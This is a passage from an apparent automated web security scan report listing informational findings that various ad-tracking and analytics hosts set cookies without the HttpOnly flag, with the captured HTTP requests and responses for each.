Set-Cookie: s_vi_jcyonx7Eyjabola=[CS]v4|26E3F9AA051612A9-400001A680400F98|4DC7F352[CE]; Expires=Sat, 7 May 2016 13:59:48 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 13:59:48 GMT
Last-Modified: Tue, 10 May 2011 13:59:48 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DC7F354-253C-40A45FE4"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www652
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

10.64. http://i.w55c.net/ping_match.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /ping_match.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping_match.gif?rurl=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D535039%26ev%3D_wfivefivec_ HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 302 Found
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Wed, 08-May-13 14:00:04 GMT
Cache-Control: private
X-Version: DataXu Pixel Tracker v3
Location: http://bh.contextweb.com/bh/rtset?do=add&pid=535039&ev=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC
Server: Jetty(6.1.22)
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 0


10.65. http://idpix.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idpix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=5392 HTTP/1.1
Host: idpix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt1rw0fxzt1tr37xzt1tr37xzt1rw0fxzt1tr37; adh=1lkkxr8160352rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh0v9kt00x3g020j0j50j; rdrlst=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; sglst=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; vstcnt=417k010r0t4exp6103210e24ru4y1032107249v4u10pj10e22te10tq10a24tmhw103210924pq44103210a24eflo218e104203210724eyja103210e24mqca103210e24fvio118e10f24fz24103210924e8bw103210824fsuv103210924fduc118e10a24uzdp103210b24dret103210724gqhl103210923sti11hj10a24styu10321092451gt10pj10e24fj52103210924o2lt103210a24m1v2103210a24f7qr218e108203210924uzg6218e100203210024fgv9218e108203210a24tfmw103210b23l4f103210a24kd6k103210c2

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=016020a0e0f0g0h1ljtllpxzt1rw0fxzt1tr37xzt1tr37xzt1rw0fxzt113zyf; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:00:04 GMT; Path=/
Set-Cookie: adh=1lkkxr8160352rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:00:04 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh13zyf00y3l010k0150k; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:00:04 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=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; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:00:04 GMT; Path=/
Set-Cookie: sglst=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; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:00:04 GMT; Path=/
Set-Cookie: vstcnt=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; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:00:04 GMT; Path=/
Location: http://ad.yieldmanager.com/unpixel?t=2&id=1124652&id=726483&id=1274357&id=1230287&id=1097682&id=919037
Content-Length: 0
Date: Mon, 09 May 2011 14:00:03 GMT


10.66. http://ie-stat.bmmetrix.com/V13a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ie-stat.bmmetrix.com
Path:   /V13a

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /V13a?http%3A%2F%2Fwww.irishtimes.com%2Fnewspaper%2Ftheticket%2F2011%2F0506%2F1224296203710.html****true/1920x1200/16/irishtimes_ie/ie/UTF-8/1304949672361 HTTP/1.1
Host: ie-stat.bmmetrix.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 14:03:50 GMT
Server: Apache/2
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:03:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: Cid=4bc9b72c8f416e9f502b1f6a19b57f41%3A1304949830; expires=Tue, 01 Jan 2030 00:00:00 GMT; path=/
Set-Cookie: Sid=2be59b06d773b1fb5d3996973908bea1%3A1304951630; path=/
Location: http://ie-stat.bmmetrix.com/V13b?http%3A%2F%2Fwww.irishtimes.com%2Fnewspaper%2Ftheticket%2F2011%2F0506%2F1224296203710.html****true/1920x1200/16/irishtimes_ie/ie/UTF-8/1304949672361
Content-Length: 365
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ie-stat.bmmetrix.com/V13b?http%3A%2F%2Fw
...[SNIP]...

10.67. http://ie-stat.bmmetrix.com/V13b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ie-stat.bmmetrix.com
Path:   /V13b

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /V13b?http%3A%2F%2Fwww.irishtimes.com%2Fnewspaper%2Ftheticket%2F2011%2F0506%2F1224296203710.html****true/1920x1200/16/irishtimes_ie/ie/UTF-8/1304949672361 HTTP/1.1
Host: ie-stat.bmmetrix.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Cid=21725df4b57823249eec87a56c238d3d%3A1304949674; Sid=a67edadab4a72f17f0c0ed04fa46edb7%3A1304951474

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:04:40 GMT
Server: Apache/2
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:04:40 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: Sid=a67edadab4a72f17f0c0ed04fa46edb7%3A1304951680; path=/
Set-Cookie: Bm_map=bt_ie_1_585=1; expires=Tue, 01 Jan 2030 00:00:00 GMT; path=/
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.68. http://image2.pubmatic.com/AdServer/Pug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODImdGw9MTU3NjgwMCZkcF9pZD0yMg==&piggybackCookie=pcv:1|uid:2931142961646634775 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889; KADUSERCOOKIE=29E43D8F-52C5-4C7B-B2EA-0181496E6671

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:09 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889; domain=pubmatic.com; expires=Thu, 01-May-2014 17:54:49 GMT; path=/
Content-Length: 1
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html


10.69. http://imp.fetchback.com/serve/fb/adtag.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=59534&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26630-2.3200913.3219970?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; afl=1_1304903354; cre=1_1304949669_29807:59535:1:0_29802:59536:1:588698_29805:59534:1:589359; uid=1_1304949669_1303179323923:6792170478871670; kwd=1_1304949669_12936:254607_11317:1206401_11717:1206401_11718:1206401_11719:1206401; scg=1_1304949669; ppd=1_1304949669

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:12 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1304949672_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:12 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 14:01:12 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 294

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=59534&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26630-2.3200913.3219970?url=' width='728' heigh
...[SNIP]...

10.70. http://imp.fetchback.com/serve/fb/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=59534&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26630-2.3200913.3219970?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; afl=1_1304903354; cre=1_1304949669_29807:59535:1:0_29802:59536:1:588698_29805:59534:1:589359; kwd=1_1304949669_12936:254607_11317:1206401_11717:1206401_11718:1206401_11719:1206401; scg=1_1304949669; ppd=1_1304949669; uid=1_1304949672_1303179323923:6792170478871670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:14 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1304949674_29805:59534:2:0_29807:59535:1:5_29802:59536:1:588703; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Set-Cookie: uid=1_1304949674_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Set-Cookie: kwd=1_1304949674_12936:254612_11317:1206406_11717:1206406_11718:1206406_11719:1206406; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Set-Cookie: scg=1_1304949674; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Set-Cookie: ppd=1_1304949674; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 14:01:14 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10433

<style type="text/css">body {margin: 0px; padding: 0px;}</style>
<a href="http://imp.fetchback.com/serve/fb/overlay?8945eae51d9a2c8e4a5ff0a7577d8283a6c350af96ce36b3985a1944046ffd99d3a4259f239ce6c8683e
...[SNIP]...

10.71. http://ipcmedia.122.2o7.net/b/ss/nmeprod,ipcauditglobalprod/1/H.22.1/s89725573572795

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ipcmedia.122.2o7.net
Path:   /b/ss/nmeprod,ipcauditglobalprod/1/H.22.1/s89725573572795

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/nmeprod,ipcauditglobalprod/1/H.22.1/s89725573572795?AQB=1&ndh=1&t=9%2F4%2F2011%209%3A0%3A42%201%20300&ce=UTF-8&ns=ipcmedia&pageName=Sufjan%20Stevens%20suffered%20'breakdown'%20while%20watching%20'Fantastic%20Mr%20Fox'%20%7C%20News%20%7C%20NME.COM&g=http%3A%2F%2Fwww.nme.com%2Fnews%2Fsufjan-stevens%2F56527&cc=GBP&ch=News&server=frr-003&c7=tk%3Anews%3Asufjan-stevens%3A56527%3A9&c8=news&c9=56527&c10=sufjan%20stevens%20suffered%20'breakdown'%20while%20watching%20'fantastic%20mr%20fox'&c50=nme&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: ipcmedia.122.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_nyhylx7B88x3D=[CS]v4|26E3F9A98514A256-6000018C80238AC6|4DC7F352[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|26E3F9A98514A256-6000018C80238AC8|4DC7F352[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 14:01:00 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E3F9CE051D0977-400001334000936E[CE]; Expires=Sat, 7 May 2016 14:01:00 GMT; Domain=ipcmedia.122.2o7.net; Path=/
Location: http://ipcmedia.122.2o7.net/b/ss/nmeprod,ipcauditglobalprod/1/H.22.1/s89725573572795?AQB=1&pccr=true&vidn=26E3F9CE051D0977-400001334000936E&&ndh=1&t=9%2F4%2F2011%209%3A0%3A42%201%20300&ce=UTF-8&ns=ipcmedia&pageName=Sufjan%20Stevens%20suffered%20'breakdown'%20while%20watching%20'Fantastic%20Mr%20Fox'%20%7C%20News%20%7C%20NME.COM&g=http%3A%2F%2Fwww.nme.com%2Fnews%2Fsufjan-stevens%2F56527&cc=GBP&ch=News&server=frr-003&c7=tk%3Anews%3Asufjan-stevens%3A56527%3A9&c8=news&c9=56527&c10=sufjan%20stevens%20suffered%20'breakdown'%20while%20watching%20'fantastic%20mr%20fox'&c50=nme&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 14:01:00 GMT
Last-Modified: Tue, 10 May 2011 14:01:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www354
Content-Length: 0
Content-Type: text/plain


10.72. http://ipcmedia.grapeshot.co.uk/channels.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ipcmedia.grapeshot.co.uk
Path:   /channels.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /channels.cgi?url=http%3A//www.nme.com/news/sufjan-stevens/56527 HTTP/1.1
Host: ipcmedia.grapeshot.co.uk
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=1503275853

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: 600
GSCategories: olympics (10.846109)
GSID: hk7gfe0
GSResponse: OK
GSResponseDetails: C=1 BC=0 BF=0 CU=0 CC=0
GSUID: 1503275853
GSDeployment: nme
Set-Cookie: uid=1503275853; Path=/; Domain=.grapeshot.co.uk; Max-Age=31536000; Version=1
Connection: close
Content-Type: text/javascript
Content-Length: 114

// Set gs_channels variable for insertion into an advert call
// contextual categories
gs_channels = "olympics";


10.73. http://irishtimesgroup.112.2o7.net/b/ss/itgirishtimesprod/1/H.15.1/s81982920831069

Summary

Severity:   Information
Confidence:   Certain
Host:   http://irishtimesgroup.112.2o7.net
Path:   /b/ss/itgirishtimesprod/1/H.15.1/s81982920831069

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/itgirishtimesprod/1/H.15.1/s81982920831069?[AQB]&ndh=1&t=9/4/2011%209%3A1%3A12%201%20300&ns=irishtimesgroup&pageName=culture%20article%20full%20-%20Shakin%27%20Stevens&g=http%3A//www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html&cc=EUR&events=event2&h1=culture%2Cmusic%2Carticle&v2=culture%20article%20full%20-%20Shakin%27%20Stevens&c3=Shakin%27%20Stevens&v3=Shakin%27%20Stevens&c4=1224296203710&v4=1224296203710&c5=article&v5=article&c6=culture&v6=culture&c7=culture%3Amusic&v7=culture%3Amusic&c15=newspaper&v15=newspaper&c17=Data%20Not%20Available&v17=Data%20Not%20Available&c18=Data%20Not%20Available&v18=Data%20Not%20Available&c19=Data%20Not%20Available&v19=Data%20Not%20Available&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: irishtimesgroup.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_nyhylx7B88x3D=[CS]v4|26E3F9A98514A256-6000018C80238AC6|4DC7F352[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|26E3F9A98514A256-6000018C80238AC8|4DC7F352[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 14:04:09 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E3FA2C85010514-40000113002F9539[CE]; Expires=Sat, 7 May 2016 14:04:09 GMT; Domain=irishtimesgroup.112.2o7.net; Path=/
Location: http://irishtimesgroup.112.2o7.net/b/ss/itgirishtimesprod/1/H.15.1/s81982920831069?AQB=1&pccr=true&vidn=26E3FA2C85010514-40000113002F9539&&ndh=1&t=9/4/2011%209%3A1%3A12%201%20300&ns=irishtimesgroup&pageName=culture%20article%20full%20-%20Shakin%27%20Stevens&g=http%3A//www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html&cc=EUR&events=event2&h1=culture%2Cmusic%2Carticle&v2=culture%20article%20full%20-%20Shakin%27%20Stevens&c3=Shakin%27%20Stevens&v3=Shakin%27%20Stevens&c4=1224296203710&v4=1224296203710&c5=article&v5=article&c6=culture&v6=culture&c7=culture%3Amusic&v7=culture%3Amusic&c15=newspaper&v15=newspaper&c17=Data%20Not%20Available&v17=Data%20Not%20Available&c18=Data%20Not%20Available&v18=Data%20Not%20Available&c19=Data%20Not%20Available&v19=Data%20Not%20Available&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
